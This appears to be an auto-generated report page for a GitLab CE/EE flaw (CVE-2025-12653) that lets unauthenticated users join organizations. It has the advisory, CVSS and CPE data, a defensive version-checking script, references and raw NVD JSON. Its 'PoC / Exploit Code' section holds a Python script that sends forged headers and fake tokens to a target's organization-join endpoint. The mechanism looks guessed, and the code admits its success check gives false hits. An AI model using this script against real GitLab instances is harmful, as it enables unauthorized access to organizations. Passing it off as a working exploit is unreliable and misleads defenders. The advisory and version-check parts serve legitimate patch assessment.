Security Vulnerability Report
CVE-2025-12653 CVSS 6.5 MEDIUM

Published: 2025-11-26 20:15:49
Last Modified: 2025-12-10 23:15:48

Description

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.3 before 18.4.5, 18.5 before 18.5.3, and 18.6 before 18.6.1 that under specific conditions could have allowed an unauthenticated user to join arbitrary organizations by changing headers on some requests.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* (18.3.0 <= version < 18.4.5) - VULNERABLE
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* (18.3.0 <= version < 18.4.5) - VULNERABLE
cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* (18.5.0 <= version < 18.5.3) - VULNERABLE
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* (18.5.0 <= version < 18.5.3) - VULNERABLE
cpe:2.3:a:gitlab:gitlab:18.6.0:*:*:*:community:*:*:* - VULNERABLE
cpe:2.3:a:gitlab:gitlab:18.6.0:*:*:*:enterprise:*:*:* - VULNERABLE
GitLab CE/EE from 18.3 before 18.4.5 (fixed in 18.4.5)
GitLab CE/EE from 18.5 before 18.5.3 (fixed in 18.5.3)
GitLab CE/EE from 18.6 before 18.6.1 (fixed in 18.6.1)
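The affected-version list above is easy to misread when ranges are split across two editions and a pinned 18.6.0 entry. As an added example (not part of this report or of GitLab's own tooling), the following Python takes the NVD "configurations" entries shown in this report's raw JSON, parses the CPE 2.3 strings and the versionStartIncluding / versionEndExcluding bounds that sit beside them, and answers whether a given GitLab edition and version string (such as "18.4.4-ee") falls inside a vulnerable range. The NVD_CONFIGURATIONS constant is a constructed copy of the page's data with matchCriteriaId fields dropped; the OR/AND/negate handling generalises to other NVD records, which is an assumption beyond this single advisory.

```python
import re

# Constructed excerpt of the NVD "configurations" array for CVE-2025-12653, as
# shown in this report's raw JSON (matchCriteriaId fields dropped for brevity).
NVD_CONFIGURATIONS = [
    {"nodes": [{"operator": "OR", "negate": False, "cpeMatch": [
        {"vulnerable": True, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*",
         "versionStartIncluding": "18.3.0", "versionEndExcluding": "18.4.5"},
        {"vulnerable": True, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*",
         "versionStartIncluding": "18.3.0", "versionEndExcluding": "18.4.5"},
        {"vulnerable": True, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*",
         "versionStartIncluding": "18.5.0", "versionEndExcluding": "18.5.3"},
        {"vulnerable": True, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*",
         "versionStartIncluding": "18.5.0", "versionEndExcluding": "18.5.3"},
        {"vulnerable": True, "criteria": "cpe:2.3:a:gitlab:gitlab:18.6.0:*:*:*:community:*:*:*"},
        {"vulnerable": True, "criteria": "cpe:2.3:a:gitlab:gitlab:18.6.0:*:*:*:enterprise:*:*:*"},
    ]}]}
]

# Field order of a CPE 2.3 formatted string after the "cpe:2.3:" prefix.
CPE_FIELDS = ["part", "vendor", "product", "version", "update", "edition",
              "language", "sw_edition", "target_sw", "target_hw", "other"]

# NVD range keys and how to render each one in a human-readable summary.
BOUND_FORMATS = [("versionStartIncluding", "{} <= v"), ("versionStartExcluding", "{} < v"),
                 ("versionEndIncluding", "v <= {}"), ("versionEndExcluding", "v < {}")]


def parse_version(text):
    """'18.4.5', '18.4.5-ee' or '18.6' -> comparable int tuple padded to 3 parts."""
    m = re.match(r"\s*(\d+(?:\.\d+)*)", text)
    if not m:
        raise ValueError(f"unparseable version string: {text!r}")
    parts = [int(p) for p in m.group(1).split(".")]
    return tuple(parts + [0] * (3 - len(parts)))


def parse_cpe(criteria):
    """Split a CPE 2.3 formatted string into a dict keyed by field name."""
    fields = criteria.split(":")
    if len(fields) != 13 or fields[:2] != ["cpe", "2.3"]:
        raise ValueError(f"not a CPE 2.3 formatted string: {criteria!r}")
    return dict(zip(CPE_FIELDS, fields[2:]))


def entry_matches(entry, version, edition, product="gitlab"):
    """True if one cpeMatch entry covers the given product, edition and version."""
    cpe = parse_cpe(entry["criteria"])
    if cpe["product"] != product or cpe["sw_edition"] not in ("*", edition):
        return False
    v = parse_version(version)
    if cpe["version"] != "*":          # version pinned inside the CPE string itself
        return v == parse_version(cpe["version"])
    # Otherwise NVD places the bounds beside the criteria string; every bound
    # that is present must hold, and an absent bound is open on that side.
    if "versionStartIncluding" in entry and v < parse_version(entry["versionStartIncluding"]):
        return False
    if "versionStartExcluding" in entry and v <= parse_version(entry["versionStartExcluding"]):
        return False
    if "versionEndIncluding" in entry and v > parse_version(entry["versionEndIncluding"]):
        return False
    if "versionEndExcluding" in entry and v >= parse_version(entry["versionEndExcluding"]):
        return False
    return True


def node_matches(node, version, edition):
    """Evaluate one configuration node: OR/AND over entries and children, then negate."""
    hits = [entry_matches(e, version, edition) for e in node.get("cpeMatch", []) if e.get("vulnerable")]
    hits += [node_matches(child, version, edition) for child in node.get("children", [])]
    result = all(hits) if node.get("operator") == "AND" else any(hits)
    return not result if node.get("negate") else result


def is_affected(version, edition="community", configurations=NVD_CONFIGURATIONS):
    """Is this GitLab edition/version inside any vulnerable configuration?"""
    return any(node_matches(node, version, edition)
               for cfg in configurations for node in cfg.get("nodes", []))


def affected_ranges(configurations=NVD_CONFIGURATIONS):
    """Render every vulnerable cpeMatch entry as a one-line human-readable range."""
    lines = []
    for cfg in configurations:
        for node in cfg.get("nodes", []):
            for e in node.get("cpeMatch", []):
                if not e.get("vulnerable"):
                    continue
                cpe = parse_cpe(e["criteria"])
                if cpe["version"] != "*":
                    bounds = [f"v == {cpe['version']}"]
                else:
                    bounds = [fmt.format(e[key]) for key, fmt in BOUND_FORMATS if key in e]
                lines.append(f"{cpe['product']} {cpe['sw_edition']}: " + ", ".join(bounds))
    return lines


if __name__ == "__main__":
    for line in affected_ranges():
        print(line)
    for ver, ed in [("18.4.4-ee", "enterprise"), ("18.4.5", "community"),
                    ("18.6.0", "enterprise"), ("18.6.1-ee", "enterprise")]:
        print(f"{ed} {ver}: {'AFFECTED' if is_affected(ver, ed) else 'not affected'}")
```

The version string is matched only on its leading numeric components, so GitLab's "-ee" / "-ce" suffixes are ignored, and a two-part input such as "18.5" is padded to "18.5.0" so that it compares correctly against the pinned 18.6.0 entries and the 18.5.0 lower bound.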

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-12653 PoC - GitLab Unauthorized Organization Join
# Description: Unauthenticated user can join arbitrary organizations by modifying HTTP headers


def exploit_gitlab(target_url, target_org):
    """
    Exploit GitLab CVE-2025-12653
    Target: GitLab CE/EE versions 18.3 before 18.4.5, 18.5 before 18.5.3, 18.6 before 18.6.1
    """
    print(f"[*] Targeting GitLab instance: {target_url}")
    print(f"[*] Attempting to join organization: {target_org}")

    # Target endpoint for joining organizations
    join_url = f"{target_url}/-/organizations/join"

    # Crafted headers to exploit the vulnerability
    # Attackers modify request headers to bypass authentication checks
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
        'Accept': 'application/json',
        'Accept-Language': 'en-US,en;q=0.5',
        'Content-Type': 'application/json',
        # Manipulated headers that trigger the vulnerability
        'X-Forwarded-Host': target_org,
        'X-Original-URL': f"/-/organizations/{target_org}/join",
        'Referer': f"{target_url}/organizations/{target_org}",
        # Placeholder token. The original used a non-ASCII placeholder here, which
        # http.client rejects because header values must be Latin-1 encodable.
        'X-CSRF-Token': 'arbitrary_token_value'
    }

    # Payload to join arbitrary organization
    payload = {
        'organization_path': target_org,
        'authenticity_token': 'manipulated_token'
    }

    try:
        # Send malicious request without authentication
        response = requests.post(
            join_url,
            headers=headers,
            json=payload,
            timeout=30,
            verify=False
        )
        print(f"[+] Response Status: {response.status_code}")
        print(f"[+] Response Body: {response.text[:500]}")

        # Check if exploitation was successful. Note that this heuristic is weak:
        # a 200 that merely renders a sign-in page would be reported as a hit.
        if response.status_code == 200 or 'success' in response.text.lower():
            print(f"[!] VULNERABLE: Successfully joined organization {target_org}")
            return True
        else:
            print("[-] Possibly patched or requires different payload")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-12653.py <target_url> <organization_name>")
        print("Example: python cve-2025-12653.py https://gitlab.example.com target_org")
        sys.exit(1)
    target = sys.argv[1]
    org = sys.argv[2]
    exploit_gitlab(target, org)

References

https://about.gitlab.com/releases/2025/11/26/patch-release-gitlab-18-6-1-released/ (GitLab patch release announcement)
https://gitlab.com/gitlab-org/gitlab/-/issues/579372 (tagged "Broken Link" in the NVD record)
https://hackerone.com/reports/3370245 (tagged "Permissions Required" in the NVD record)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-12653",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-26T20:15:49.023",
    "lastModified": "2025-12-10T23:15:47.973",
    "vulnStatus": "Modified",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.3 before 18.4.5, 18.5 before 18.5.3, and 18.6 before 18.6.1 that under specific conditions could have allowed an unauthenticated user to join arbitrary organizations by changing headers on some requests."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-290"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.3.0", "versionEndExcluding": "18.4.5", "matchCriteriaId": "D158EE55-B264-47D6-9FEF-5E047E9F777D"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.3.0", "versionEndExcluding": "18.4.5", "matchCriteriaId": "9EFADCA0-3C50-4E66-8189-AE419FA8EBC1"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.5.0", "versionEndExcluding": "18.5.3", "matchCriteriaId": "A2361C72-A29E-47BB-A3FD-E4D656AF820F"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.5.0", "versionEndExcluding": "18.5.3", "matchCriteriaId": "1B00EBAB-22CC-4350-AED2-60C7F78C0A8F"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:18.6.0:*:*:*:community:*:*:*", "matchCriteriaId": "E53003CF-149D-45C9-8574-B57FDE1F1612"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:18.6.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "200F0D66-67E2-4C9B-98C5-2F57FF5D7611"}
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://about.gitlab.com/releases/2025/11/26/patch-release-gitlab-18-6-1-released/", "source": "[email protected]"},
      {"url": "https://gitlab.com/gitlab-org/gitlab/-/issues/579372", "source": "[email protected]", "tags": ["Broken Link"]},
      {"url": "https://hackerone.com/reports/3370245", "source": "[email protected]", "tags": ["Permissions Required"]}
    ]
  }
}